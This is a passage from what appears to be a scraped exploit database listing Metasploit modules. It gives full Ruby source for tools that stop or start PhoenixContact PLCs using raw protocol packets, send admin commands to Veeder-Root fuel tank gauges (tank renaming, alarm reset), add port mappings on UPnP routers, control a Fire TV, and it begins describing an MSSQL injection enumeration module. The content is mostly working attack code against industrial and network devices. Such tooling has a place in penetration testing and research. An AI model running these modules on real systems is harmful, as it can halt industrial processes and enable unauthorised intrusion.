Msf::Exploit::Remote::Tcp\n include Rex::Socket::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PhoenixContact PLC Remote START/STOP Command',\n 'Version' => '1',\n 'Description' => %q{\n PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. 
Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)\n },\n 'Author' => 'Tijl Deneut <tijl.deneut[at]howest.be>',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ],\n [ 'CVE', '2014-9195']\n ],\n 'DisclosureDate' => 'May 20 2015'))\n register_options(\n [\n OptEnum.new('ACTION', [true, 'PLC CPU action, REV means reverse current CPU state', 'NOOP',\n [\n 'STOP',\n 'START',\n 'REV',\n 'NOOP'\n ]]),\n OptPort.new('RINFOPORT', [true, 'Set info port', 1962 ]),\n OptPort.new('RPORT', [false, 'Set action port, will try autodetect when not set' ])\n ], self.class\n )\n end\n\n # Here comes the code, hang on to your pants\n def bin_to_hex(s)\n s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def hex_to_bin(s)\n s.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def send_recv_once(data)\n buf = ''\n begin\n sock.put(data)\n buf = sock.get_once || ''\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n bin_to_hex(buf)\n end\n\n def get_info(rhost, rport)\n connect(true, 'RHOST' => rhost, 'RPORT' => rport)\n data = send_recv_once(\"\\x01\\x01\\x00\\x1a\\x00^\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x0cIBETH01N0_M\\x00\")\n if data.nil? 
|| data.length < 36\n print_error(\"Could not obtain information on this device\")\n disconnect\n return \"UNKNOWN\"\n end\n code = data[34..35]\n send_recv_once(\"\\x01\\x05\\x00\\x16\\x00\\x5f\\x00\\x00\\x08\\xef\\x00\" + hex_to_bin(code) + \"\\x00\\x00\\x00\\x22\\x00\\x04\\x02\\x95\\x00\\x00\")\n data = send_recv_once(\"\\x01\\x06\\x00\\x0e\\x00\\x61\\x00\\x00\\x88\\x11\\x00\" + hex_to_bin(code) + \"\\x04\\x00\")\n disconnect\n if data.nil? || data.length < 200\n print_error(\"Could not obtain information on this device\")\n return \"UNKNOWN\"\n end\n plctype = hex_to_bin(data[60..99])\n print_status(\"PLC Type = \" + plctype)\n print_status(\"Firmware = \" + hex_to_bin(data[132..139]))\n print_status(\"Build = \" + hex_to_bin(data[158..174]) + \" \" + hex_to_bin(data[182..199]))\n print_status('------------------------------------')\n plctype\n end\n\n def init_phase1\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00/\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xffAde.Remoting.Services.IProConOSControlService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00.\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IProConOSControlService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDataAccessService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDeviceInfoService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDeviceInfoService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00%\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd9\\xffAde.Remoting.Services.IForceService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00$\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IForceService\\x00\")\n 
send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xce\\xffAde.Remoting.Services.ISimpleFileAccessService3\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.ISimpleFileAccessService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDeviceInfoService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDeviceInfoService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDataAccessService3\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDataAccessService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDataAccessService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd5\\xffAde.Remoting.Services.IBreakpointService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd6\\xffAde.Remoting.Services.ICallstackService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00%\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDebugService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00/\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xffAde.Remoting.Services.IProConOSControlService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00.\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IProConOSControlService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xce\\xffAde.Remoting.Services.ISimpleFileAccessService3\\x00\")\n 
send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.ISimpleFileAccessService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x0e\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x12@\\x13@\\x13\\x00\\x11@\\x12\\x00\")\n end\n\n def init_phase2\n send_recv_once(\"\\xcc\\x01\\x00\\r\\xc0\\x01\\x00\\x00\\xd5\\x17\")\n send_recv_once(\"\\xcc\\x01\\x00\\x0b@\\x02\\x00\\x00G\\xee\")\n send_recv_once(\"\\xcc\\x01\\x00[@\\x03\\x1c\\x00\\x01\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\x9a\")\n send_recv_once(\"\\xcc\\x01\\x00[@\\x04\\x1c\\x00\\x01\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xeaC\")\n send_recv_once(\"\\xcc\\x01\\x00\\x06@\\x05\\x00\\x006\\x1e\")\n send_recv_once(\"\\xcc\\x01\\x00\\x07@\\x06\\x10\\x00&u\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x82\")\n end\n\n def get_state1(data)\n if data[48..49] == '03'\n state = 'RUN'\n elsif data[48..49] == '07'\n state = 'STOP'\n elsif data[49..49] == '00'\n state = 'ON'\n else\n print_error('CPU State not detected, full result is ' + data)\n return\n end\n state\n end\n\n def get_state2(data)\n if data[16..17] == '04'\n state = 'STOP'\n elsif data[16..17] == '02'\n state = 'RUN'\n else\n print_error('CPU State not detected, full result is ' + data)\n return\n end\n state\n end\n\n def get_cpu(rhost, rport, devicetype)\n connect(true, 'RHOST' => rhost, 'RPORT' => rport)\n state = 'unknown'\n if devicetype == '15x'\n init_phase1\n ## KeepAlive packet\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x1c\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x07\\x00\\x05\\x00\\x06\\x00\\x08\\x00\\x10\\x00\\x02\\x00\\x11\\x00\\x0e\\x00\\x0f\\x00\\r\\x00\\x16@\\x16\\x00\")\n ## Query packet\n data = 
send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x08\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x40\\x0b\\x40\")\n state = get_state1(data)\n elsif devicetype == '39x'\n init_phase2\n data = send_recv_once(\"\\xcc\\x01\\x00\\x0f@\\x07\\x00\\x00\\xea\\xfa\")\n state = get_state2(data)\n end\n disconnect\n print_status('CPU Mode = ' + state)\n state\n end\n\n def set_cpu(rhost, rport, action, state, devicetype)\n connect(true, 'RHOST' => rhost, 'RPORT' => rport)\n if devicetype == '15x'\n init_phase1 ## Several packets (21)\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x1c\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x07\\x00\\x05\\x00\\x06\\x00\\x08\\x00\\x10\\x00\\x02\\x00\\x11\\x00\\x0e\\x00\\x0f\\x00\\r\\x00\\x16@\\x16\\x00\")\n if action == 'START' || (action == 'REV' && state == 'STOP')\n print_status('--> Sending COLD start now')\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x01\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x01\\x00\")\n else\n print_status('--> Sending STOP now')\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x07\\x00\\x00\\x00\\x00\\x00\")\n end\n elsif devicetype == '39x'\n init_phase2 ## Several packets (6)\n if action == 'START' || (action == 'REV' && state == 'STOP')\n print_status('--> Sending COLD start now')\n send_recv_once(\"\\xcc\\x01\\x00\\x04\\x40\\x0e\\x00\\x00\\x18\\x21\")\n else\n print_status('--> Sending STOP now')\n send_recv_once(\"\\xcc\\x01\\x00\\x01\\x40\\x0e\\x00\\x00\\x4c\\x07\")\n end\n else\n print_error('Unknown device type')\n return\n end\n sleep(1) ## It takes a second for a PLC to start\n get_cpu(rhost, rport, devicetype)\n disconnect\n end\n\n def run\n rhost = datastore['RHOST']\n action = datastore['ACTION']\n ractionport = datastore['RPORT']\n\n device = get_info(rhost, datastore['RINFOPORT'])\n\n if device.start_with?('ILC 15', 'ILC 17')\n devicetype = '15x'\n print_status('--> Detected 15x/17x series, getting current CPU 
state:')\n ractionport.nil? ? (rport = 41100) : (rport = ractionport)\n elsif device.start_with?('ILC 39')\n devicetype = '39x'\n print_status('--> Detected 39x series, getting current CPU state:')\n ractionport.nil? ? (rport = 20547) : (rport = ractionport)\n else\n print_error('Only ILC and (some) RFC devices are supported.')\n return\n end\n\n state = get_cpu(rhost, rport, devicetype)\n print_status('------------------------------------')\n\n if action == \"NOOP\"\n print_status(\"--> No action specified (#{action}), stopping here\")\n return\n end\n\n set_cpu(rhost, rport, action, state, devicetype)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/phoenix_command.rb"}, {"lastseen": "2019-11-22T17:14:59", "bulletinFamily": "exploit", "description": "This module acts as a simplistic administrative client for interfacing with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking the TLS-250 and TLS-350 protocols. 
This has been tested against GasPot and Conpot, both honeypots meant to simulate ATGs; it has not been tested against anything else, so use at your own risk.\n", "modified": "2017-07-24T13:26:21", "published": "2015-11-17T18:59:37", "id": "MSF:AUXILIARY/ADMIN/ATG/ATG_CLIENT", "href": "", "type": "metasploit", "title": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Veeder-Root Automatic Tank Gauge (ATG) Administrative Client',\n 'Description' => %q{\n This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.\n },\n 'Author' =>\n [\n 'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges'],\n ['URL', 'http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment'],\n ['URL', 'https://github.com/sjhilt/GasPot'],\n ['URL', 'https://github.com/mushorg/conpot'],\n ['URL', 'http://www.veeder.com/us/automatic-tank-gauge-atg-consoles'],\n ['URL', 'http://www.chipkin.com/files/liz/576013-635.pdf'],\n ['URL', 'http://www.veeder.com/gold/download.cfm?doc_id=6227']\n ],\n 'DefaultAction' => 'INVENTORY',\n 'Actions' =>\n [\n [ 'ALARM',\n {\n 'Description' => 'I30200 Sensor alarm history (untested)',\n 'TLS-350_CMD' => 
\"\\x01I30200\"\n }\n ],\n [ 'ALARM_RESET',\n {\n 'Description' => 'IS00300 Remote alarm reset (untested)',\n 'TLS-350_CMD' => \"\\x01IS00300\"\n }\n ],\n [ 'DELIVERY',\n {\n 'Description' => 'I20200 Delivery report',\n 'TLS-350_CMD' => \"\\x01I20200\"\n }\n ],\n [ 'INVENTORY',\n {\n 'Description' => '200/I20100 In-tank inventory report',\n 'TLS-250_CMD' => \"\\x01200\",\n 'TLS-350_CMD' => \"\\x01I20100\"\n }\n ],\n [ 'LEAK',\n {\n 'Description' => 'I20300 Leak report',\n 'TLS-350_CMD' => \"\\x01I20300\"\n }\n ],\n [ 'RELAY',\n {\n 'Description' => 'I40600 Relay status (untested)',\n 'TLS-350_CMD' => \"\\x01I40600\"\n }\n ],\n [ 'RESET',\n {\n 'Description' => 'IS00100 Reset (untested)',\n 'TLS-350_CMD' => \"\\x01IS00100\"\n }\n ],\n [ 'CLEAR_RESET',\n {\n 'Description' => 'IS00200 Clear Reset Flag (untested)',\n 'TLS-350_CMD' => \"\\x01IS00200\"\n }\n ],\n [ 'SENSOR',\n {\n 'Description' => 'I30100 Sensor status (untested)',\n 'TLS-350_CMD' => \"\\x01I30100\"\n }\n ],\n [ 'SENSOR_DIAG',\n {\n 'Description' => 'IB0100 Sensor diagnostics (untested)',\n 'TLS-350_CMD' => \"\\x01IB0100\"\n }\n ],\n [ 'SHIFT',\n {\n 'Description' => 'I20400 Shift report',\n 'TLS-350_CMD' => \"\\x01I20400\"\n }\n ],\n [ 'SET_TANK_NAME',\n {\n 'Description' => 'S602 set tank name (use TANK_NUMBER and TANK_NAME options)',\n 'TLS-350_CMD' => \"\\x01S602\"\n }\n ],\n # [ 'SET_TIME',\n # {\n # 'Description' => 'S50100 Set time of day (use TIME option) (untested)',\n # 'TLS-350_CMD' => \"\\x01S50100\"\n # }\n # ],\n [ 'STATUS',\n {\n 'Description' => 'I20500 In-tank status report',\n 'TLS-350_CMD' => \"\\x01I20500\"\n }\n ],\n [ 'SYSTEM_STATUS',\n {\n 'Description' => 'I10100 System status report (untested)',\n 'TLS-350_CMD' => \"\\x01I10100\"\n }\n ],\n [ 'TANK_ALARM',\n {\n 'Description' => 'I20600 Tank alarm history (untested)',\n 'TLS-350_CMD' => \"\\x01I20600\"\n }\n ],\n [ 'TANK_DIAG',\n {\n 'Description' => 'IA0100 Tank diagnostics (untested)',\n 'TLS-350_CMD' => \"\\x01IA0100\"\n }\n 
],\n [ 'VERSION',\n {\n 'Description' => 'Version information',\n 'TLS-250_CMD' => \"\\x01980\",\n 'TLS-350_CMD' => \"\\x01I90200\"\n }\n ]\n ]\n )\n\n register_options(\n [\n Opt::RPORT(10001),\n OptInt.new('TANK_NUMBER', [false, 'The tank number to operate on (use with SET_TANK_NAME, 0 to change all)', 1]),\n OptString.new('TANK_NAME', [false, 'The tank name to set (use with SET_TANK_NAME, defaults to random)'])\n ]\n )\n deregister_options('SSL', 'SSLCipher', 'SSLVerifyMode', 'SSLVersion')\n\n register_advanced_options(\n [\n OptEnum.new('PROTOCOL', [true, 'The Veeder-Root TLS protocol to speak', 'TLS-350', %w(TLS-350 TLS-250)]),\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for responses to our probes', 5])\n ]\n )\n end\n\n def setup\n # ensure that the specified command is implemented for the desired version of the TLS protocol\n unless action.opts.keys.include?(protocol_opt_name)\n fail_with(Failure::BadConfig, \"#{action.name} not defined for #{protocol}\")\n end\n\n # ensure that the tank number is set for the commands that need it\n if action.name == 'SET_TANK_NAME' && (tank_number < 0 || tank_number > 99)\n fail_with(Failure::BadConfig, \"TANK_NUMBER #{tank_number} is invalid\")\n end\n\n unless timeout > 0\n fail_with(Failure::BadConfig, \"Invalid timeout #{timeout} -- must be > 0\")\n end\n end\n\n def get_response(request)\n sock.put(request)\n response = sock.get_once(-1, timeout)\n response.strip!\n response += \" (command not understood)\" if response == \"9999FF1B\"\n response\n end\n\n def protocol\n datastore['PROTOCOL']\n end\n\n def protocol_opt_name\n protocol + '_CMD'\n end\n\n def tank_name\n @tank_name ||= (datastore['TANK_NAME'] ? 
datastore['TANK_NAME'] : Rex::Text.rand_text_alpha(16))\n end\n\n def tank_number\n datastore['TANK_NUMBER']\n end\n\n def time\n if datastore['TIME']\n Time.parse(datastore['TIME']).to_i\n else\n Time.now.to_i\n end\n end\n\n def timeout\n datastore['TIMEOUT']\n end\n\n def run_host(_host)\n begin\n connect\n case action.name\n when 'SET_TANK_NAME'\n # send the set tank name command to change the tank name(s)\n if tank_number == 0\n vprint_status(\"Setting all tank names to #{tank_name}\")\n else\n vprint_status(\"Setting tank ##{tank_number}'s name to #{tank_name}\")\n end\n request = \"#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\\n\"\n sock.put(request)\n # reconnect\n disconnect\n connect\n # send an inventory probe to show that it succeeded\n inventory_probe = \"#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\\n\"\n inventory_response = get_response(inventory_probe)\n message = \"#{protocol} #{action.opts['Description']}:\\n#{inventory_response}\"\n if inventory_response.include?(tank_name)\n print_good message\n else\n print_warning message\n end\n else\n response = get_response(\"#{action.opts[protocol_opt_name]}\\n\")\n print_good(\"#{protocol} #{action.opts['Description']}:\")\n print_line(response)\n end\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/atg/atg_client.rb"}, {"lastseen": "2019-12-04T18:14:04", "bulletinFamily": "exploit", "description": "Manage port mappings on UPnP IGD-capable device using the AddPortMapping and DeletePortMapping SOAP requests\n", "modified": "2017-07-24T13:26:21", "published": "2015-08-31T17:22:36", "id": "MSF:AUXILIARY/ADMIN/UPNP/SOAP_PORTMAPPING", "href": "", "type": "metasploit", "title": "UPnP IGD SOAP Port Mapping Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'UPnP IGD SOAP Port Mapping Utility',\n 'Description' => %q{\n Manage port mappings on UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests\n },\n 'Author' =>\n [\n 'St0rn <fabien[at]anbu-pentest.com>', # initial module\n 'Jon Hart <jon_hart[at]rapid7.com>' # module cleanup and refactoring\n ],\n 'License' => MSF_LICENSE,\n 'References' => [['URL', 'http://www.upnp-hacks.org/igd.html']],\n 'DefaultAction' => 'ADD',\n 'Actions' =>\n [\n [ 'ADD',\n {\n 'Description' => 'Use the AddPortMapping SOAP command to open and forward a port',\n 'SOAP_ACTION' => 'AddPortMapping'\n }\n ],\n [ 'DELETE',\n {\n 'Description' => 'Use the DeletePortMapping SOAP command to remove a port forwarding',\n 'SOAP_ACTION' => 'DeletePortMapping'\n }\n ]\n ],\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'UPnP control URL', '/' ]),\n OptAddress.new('INTERNAL_CLIENT', [false, 'Internal client hostname/IP']),\n OptAddress.new('EXTERNAL_CLIENT', [false, 'External client hostname/IP']),\n OptEnum.new('PROTOCOL', [true, 'Transport level protocol to map', 'TCP', %w(TCP UDP)]),\n OptInt.new('INTERNAL_PORT', [false, 'Internal port']),\n OptInt.new('EXTERNAL_PORT', [true, 'External port']),\n OptInt.new('LEASE_DURATION', [false, 'Lease time for mapping, in seconds', 3600])\n ],\n self.class\n )\n end\n\n def internal_port\n @internal_port ||= datastore['INTERNAL_PORT']\n end\n\n def internal_client\n @internal_client ||= datastore['INTERNAL_CLIENT']\n end\n\n def external_port\n @external_port ||= datastore['EXTERNAL_PORT']\n end\n\n def external_client\n @external_client ||= datastore['EXTERNAL_CLIENT']\n end\n\n def lease_duration\n @lease_duration ||= datastore['LEASE_DURATION']\n end\n\n def protocol\n @protocol ||= datastore['PROTOCOL']\n end\n\n 
def soap_action\n @soap_action ||= action.opts['SOAP_ACTION']\n end\n\n def build_soap\n builder = ::Nokogiri::XML::Builder.new do |xml|\n xml['SOAP-ENV'].Envelope('xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope', 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/') do\n xml['SOAP-ENV'].Body do\n xml['m'].send(soap_action, 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1') do\n case action.name\n when 'ADD'\n xml.NewPortMappingDescription(Rex::Text.rand_text_alpha(8)) { xml.parent.namespace = nil }\n xml.NewLeaseDuration(lease_duration) { xml.parent.namespace = nil }\n xml.NewInternalClient(internal_client) { xml.parent.namespace = nil }\n xml.NewEnabled(1) { xml.parent.namespace = nil }\n xml.NewExternalPort(external_port) { xml.parent.namespace = nil }\n xml.NewRemoteHost(external_client) { xml.parent.namespace = nil }\n xml.NewProtocol(protocol) { xml.parent.namespace = nil }\n xml.NewInternalPort(internal_port) { xml.parent.namespace = nil }\n when 'DELETE'\n xml.NewExternalPort(external_port) { xml.parent.namespace = nil }\n xml.NewRemoteHost(external_client) { xml.parent.namespace = nil }\n xml.NewProtocol(protocol) { xml.parent.namespace = nil }\n end\n end\n end\n end\n end\n builder.to_xml\n end\n\n def run\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'content-type' => 'text/xml;charset=\"utf-8\"',\n 'data' => build_soap,\n 'headers' => {\n 'SoapAction' => \"urn:schemas-upnp-org:service:WANIPConnection:1##{soap_action}\"\n }\n )\n\n external_map = \"#{external_client ? external_client : 'any'}:#{external_port}/#{protocol}\"\n internal_map = \"#{internal_client ? 
internal_client : 'any'}:#{internal_port}/#{protocol}\"\n map = \"#{external_map} -> #{internal_map}\"\n\n if res\n if res.code == 200\n print_good(\"#{peer} #{map} #{action.name} succeeded\")\n else\n print_error(\"#{peer} #{map} #{action.name} failed with response code #{res.code}\")\n vprint_status(\"#{res.body}\")\n end\n else\n print_error(\"#{peer} no response for #{map} #{action.name}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/upnp/soap_portmapping.rb"}, {"lastseen": "2019-11-27T19:22:14", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for the Amazon Fire TV's YouTube app. Tested on the Amazon Fire TV Stick.\n", "modified": "2017-07-24T13:26:21", "published": "2015-02-17T11:44:04", "id": "MSF:AUXILIARY/ADMIN/FIRETV/FIRETV_YOUTUBE", "href": "", "type": "metasploit", "title": "Amazon Fire TV YouTube Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Amazon Fire TV YouTube Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.\n },\n 'Author' => ['wvu'],\n 'References' => [\n ['URL', 'http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1'],\n ['URL', 'http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Play', 'Description' => 'Play video'],\n ['Stop', 'Description' => 'Stop video']\n ],\n 'DefaultAction' => 'Play'\n ))\n\n register_options([\n Opt::RPORT(8008),\n OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])\n ])\n end\n\n def run\n case action.name\n 
when 'Play'\n stop\n sleep(1)\n res = play\n when 'Stop'\n res = stop\n end\n\n return unless res\n\n case res.code\n when 201\n print_good(\"Playing https://www.youtube.com/watch?v=#{datastore['VID']}\")\n when 200\n print_status('Stopping video')\n when 404\n print_error(\"Couldn't #{action.name.downcase} video\")\n end\n end\n\n def play\n begin\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/apps/YouTube',\n 'ctype' => 'text/plain',\n 'vars_post' => {\n 'v' => datastore['VID']\n }\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\n\n def stop\n begin\n send_request_raw(\n 'method' => 'DELETE',\n 'uri' => '/apps/YouTube/run'\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/firetv/firetv_youtube.rb"}, {"lastseen": "2019-10-01T16:08:47", "bulletinFamily": "exploit", "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSER_SNAME function via Error Based SQL injection. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated accounts can then be used in online dictionary attacks. 
The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-25T15:57:20", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_DOMAIN_ACCOUNTS_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration',\n 'Description' => %q{\n This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. 
